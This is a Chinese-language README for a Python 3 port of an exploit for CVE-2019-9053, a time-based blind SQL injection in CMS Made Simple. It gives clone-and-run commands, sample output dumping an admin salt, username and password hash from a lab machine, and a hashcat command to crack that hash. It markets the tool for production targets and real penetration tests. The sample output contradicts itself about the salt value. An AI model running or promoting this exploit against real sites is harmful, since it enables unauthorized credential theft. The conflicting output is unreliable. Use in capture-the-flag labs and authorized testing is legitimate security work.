原始 Exploit-DB #46635 的纯 Python3 移植版本,原作者为 Daniele Scanu。基于时间的盲注 SQL 注入,用于从存在漏洞的 CMS Made Simple 安装中导出管理员凭据。
✅ 无外部依赖(仅需 requests)
✅ 原生 Python 3.6+(f-strings、海象运算符)
✅ 美观的彩色输出(ANSI)
✅ 稳定且快速(平均网络连接条件下约 3-5 分钟完成导出)
✅ 针对生产环境目标的超时/错误处理
✅ 可直接用于 Hashcat 的输出(salt + MD5 格式)
# Clone & run
git clone https://github.com/tim-karov/cmsms-sqli
cd cmsms-sqli
python3 cmsms-sqli.py url
# Example output (HTB Writeup):
[+] CVE-2019-9053 CMS Made Simple SQLi (Python3)
[+] Target: http://machine_ip/writeup/moduleinterface.php?mact=News,m1_,default,0
[+] Dumping SALT...
5a599ef579066807
[+] Salt: L7b8v5p3
[+] Dumping USERNAME...
jkr
[+] Username: jkr
[+] Dumping PASSWORD MD5...
62def4866937f08cc13bab43bb14e6f7
[+] MD5 Hash: 62def4866937f08cc13bab43bb14e6f7
[+] Crack: hashcat -a 0 -m 20 '62def4866937f08cc13bab43bb14e6f7:5a599ef579066807' /usr/share/wordlists/rockyou.txt
TIME = 3 # Sleep time (slower = more stable)
timeout = 20 # Request timeout
chars = '...' # Custom charset
原作者:Daniele Scanu
Exploit-DB:#46635
Python3 移植与改进:Tim Karov
MIT 许可证 - 参见 LICENSE
⭐ 如果对您有用,请点亮星标!适用于 HTB/TryHackMe 实验室及真实渗透测试。